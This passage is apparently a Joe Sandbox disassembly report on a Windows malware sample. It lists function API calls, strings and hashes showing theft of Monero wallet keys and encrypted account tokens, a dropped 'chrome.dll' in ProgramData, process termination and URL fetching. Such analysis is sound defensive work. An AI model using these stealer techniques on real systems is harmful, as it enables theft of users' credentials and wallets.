                            • Opcode ID: b2258c7b695738c1692d2ddc7728fcba4565ad7f0e221932181fdbf2f65f2572
                            • Instruction ID: b5e6c7c10d89bf0fcacd47431dca23e19f58bda7059316320126867eb7883d94
                            • Opcode Fuzzy Hash: b2258c7b695738c1692d2ddc7728fcba4565ad7f0e221932181fdbf2f65f2572
                            • Instruction Fuzzy Hash: 210167B5A40309BFDB14DBD4DD4AFAEB778EB44701F004594FA15A7385D7705A40CB90
                            Function 00E4BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                            • lstrlen.KERNEL32(00000000), ref: 00E4BC6F
                              • Part of subcall function 00E58FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E58FE2
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 00E4BC9D
                            • lstrlen.KERNEL32(00000000), ref: 00E4BD75
                            • lstrlen.KERNEL32(00000000), ref: 00E4BD89
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: 9c4e75cb26f87f18e9388d6bd5981d6ad68164250169ef7062b237c7bf1e7140
                            • Instruction ID: 31600fd0aa1bd68fe1d24d8ea241d1e9e2e6b4af44d199f9a6b2c204610c614c
                            • Opcode Fuzzy Hash: 9c4e75cb26f87f18e9388d6bd5981d6ad68164250169ef7062b237c7bf1e7140
                            • Instruction Fuzzy Hash: D3B123719101089BCF14FBA0DD66EEEB379AF54301F485AB8F91672191EF346A4CCB62
                            Function 00E56A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: ef8ccc28edc8224ff7ec9ed46131d67d517254099d27420aeaa74eb85e5d19d7
                            • Instruction ID: 7d31726ad75fcb1bce7e1b02433092d4e40ed6754cd2f67048928476a1ba31b3
                            • Opcode Fuzzy Hash: ef8ccc28edc8224ff7ec9ed46131d67d517254099d27420aeaa74eb85e5d19d7
                            • Instruction Fuzzy Hash: 28F08230988219EFD3589FE0E60979CFB31EB04707F1141A5FA29A72C4D6705AC4DB52
                            Function 00E508A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E59850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00E508DC,C:\ProgramData\chrome.dll), ref: 00E59871
                              • Part of subcall function 00E4A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E4A098
                            • StrCmpCA.SHLWAPI(00000000,009C9938), ref: 00E50922
                            • StrCmpCA.SHLWAPI(00000000,009C99A8), ref: 00E50B79
                            • StrCmpCA.SHLWAPI(00000000,009C9928), ref: 00E50A0C
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                            • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00E50C35
                            Strings
                            • C:\ProgramData\chrome.dll, xrefs: 00E508CD
                            • C:\ProgramData\chrome.dll, xrefs: 00E50C30
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                            • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                            • API String ID: 585553867-663540502
                            • Opcode ID: 4cebddd2f1549aa532368a76fef8e1f66fa3e42b57b534b2f2c7ebee247cf88b
                            • Instruction ID: 3e364b4d9813b31e0886299ac2e8aeb1eee1f51a05f32481828898e9727d3db8
                            • Opcode Fuzzy Hash: 4cebddd2f1549aa532368a76fef8e1f66fa3e42b57b534b2f2c7ebee247cf88b
                            • Instruction Fuzzy Hash: F2A169717002089FCF28FF64D996EED77B6AF95300F14956DE80A5F342DA309A09CB92
                            Function 00E49E30 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 163stringsleepCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E58CF0: GetSystemTime.KERNEL32(00E60E1B,009CB1A0,00E605B6,?,?,00E413F9,?,0000001A,00E60E1B,00000000,?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E58D16
                            • wsprintfA.USER32 ref: 00E49E7F
                            • lstrcat.KERNEL32(00000000,?), ref: 00E49F03
                            • lstrcat.KERNEL32(00000000,?), ref: 00E49F17
                            • lstrcat.KERNEL32(00000000,00E612D8), ref: 00E49F29
                            • lstrcpy.KERNEL32(?,00000000), ref: 00E49F7C
                            • Sleep.KERNEL32(00001388), ref: 00E4A013
                              • Part of subcall function 00E599A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E599C5
                              • Part of subcall function 00E599A0: Process32First.KERNEL32(00E4A056,00000128), ref: 00E599D9
                              • Part of subcall function 00E599A0: Process32Next.KERNEL32(00E4A056,00000128), ref: 00E599F2
                              • Part of subcall function 00E599A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E59A4E
                              • Part of subcall function 00E599A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00E59A6C
                              • Part of subcall function 00E599A0: CloseHandle.KERNEL32(00000000), ref: 00E59A79
                              • Part of subcall function 00E599A0: CloseHandle.KERNEL32(00E4A056), ref: 00E59A88
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                            • String ID: D
                            • API String ID: 531068710-2746444292
                            • Opcode ID: 656681a9f780806e1c7e91a9f1d41672aff97267b5523aa739a5217e6f2b1f6f
                            • Instruction ID: 0862a0b32e6b26c4792dec324a07bac84a2c373bba33929dc8662d3883affe91
                            • Opcode Fuzzy Hash: 656681a9f780806e1c7e91a9f1d41672aff97267b5523aa739a5217e6f2b1f6f
                            • Instruction Fuzzy Hash: E85165B19443189BDB24DB60DC4AFDAB3B8AB44705F044598F60DBB2C1EB755B88CF51
                            Function 00EBF9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                            Download Yara Rule
                            APIs
                            • _ValidateLocalCookies.LIBCMT ref: 00EBFA1F
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00EBFA27
                            • _ValidateLocalCookies.LIBCMT ref: 00EBFAB0
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00EBFADB
                            • _ValidateLocalCookies.LIBCMT ref: 00EBFB30
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 1170836740-1018135373
                            • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                            • Instruction ID: 9d90209dd77eda88f8e688772a0b3338bbdc6146a1d589e01221624a3f0aa716
                            • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                            • Instruction Fuzzy Hash: 77418030A00219EFCF14DF68CC84ADEBBF5AF49324F149169E919BB392D7319A05CB91
                            Function 00E45000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E4501A
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E45021
                            • InternetOpenA.WININET(00E60DE3,00000000,00000000,00000000,00000000), ref: 00E4503A
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00E45061
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00E45091
                            • InternetCloseHandle.WININET(?), ref: 00E45109
                            • InternetCloseHandle.WININET(?), ref: 00E45116
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: 0e5b68cd9e3cb9b3b63d20c97fd30ade15a38da1bc3d21ee4f5e258be203e028
                            • Instruction ID: 1a0985fa017f8799709500f300338523d5890b2b511d81ffc612e427b0c27f04
                            • Opcode Fuzzy Hash: 0e5b68cd9e3cb9b3b63d20c97fd30ade15a38da1bc3d21ee4f5e258be203e028
                            • Instruction Fuzzy Hash: 9631F6B5A40218ABDB24DF94DD85BDDB7B5AB48304F1081E8FA09B7281D7706EC58F98
                            Function 00E5856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E585B6
                            • wsprintfA.USER32 ref: 00E585E9
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E5860B
                            • RegCloseKey.ADVAPI32(00000000), ref: 00E5861C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00E58629
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                            • RegQueryValueExA.ADVAPI32(00000000,009CEA88,00000000,000F003F,?,00000400), ref: 00E5867C
                            • lstrlen.KERNEL32(?), ref: 00E58691
                            • RegQueryValueExA.ADVAPI32(00000000,009CEAA0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00E60B3C), ref: 00E58729
                            • RegCloseKey.ADVAPI32(00000000), ref: 00E58798
                            • RegCloseKey.ADVAPI32(00000000), ref: 00E587AA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: d2a4a25119d186292b48ebc8e580b02dd3a504d9757bb8bcc6db97f5e1326b7b
                            • Instruction ID: c9296ff42b632a44fec67f695f66d34f54d0b85ce3d630620043f092b848115c
                            • Opcode Fuzzy Hash: d2a4a25119d186292b48ebc8e580b02dd3a504d9757bb8bcc6db97f5e1326b7b
                            • Instruction Fuzzy Hash: 0A213B7190021C9BDB24DB54CD85FE9B3B8FB48705F0085E9E609A6280DF716AC5CFD4
                            Function 00E599A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E599C5
                            • Process32First.KERNEL32(00E4A056,00000128), ref: 00E599D9
                            • Process32Next.KERNEL32(00E4A056,00000128), ref: 00E599F2
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E59A4E
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E59A6C
                            • CloseHandle.KERNEL32(00000000), ref: 00E59A79
                            • CloseHandle.KERNEL32(00E4A056), ref: 00E59A88
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 2696918072-0
                            • Opcode ID: c2b9fb8a229feb0e483596e434b07cb34339f49da71facd2920c08903c2991d5
                            • Instruction ID: 31ab359f9f713b3ca9f546432f329cb51c7d52678b4def296c0c1e773dea3181
                            • Opcode Fuzzy Hash: c2b9fb8a229feb0e483596e434b07cb34339f49da71facd2920c08903c2991d5
                            • Instruction Fuzzy Hash: D3212C74900218EBDB35DFA1D988BEDB7B5BB48305F0045D8E909A7285D7749EC4CF60
                            Function 00E57820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57834
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E5783B
                            • RegOpenKeyExA.ADVAPI32(80000002,009BC8F8,00000000,00020119,00000000), ref: 00E5786D
                            • RegQueryValueExA.ADVAPI32(00000000,009CEB78,00000000,00000000,?,000000FF), ref: 00E5788E
                            • RegCloseKey.ADVAPI32(00000000), ref: 00E57898
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
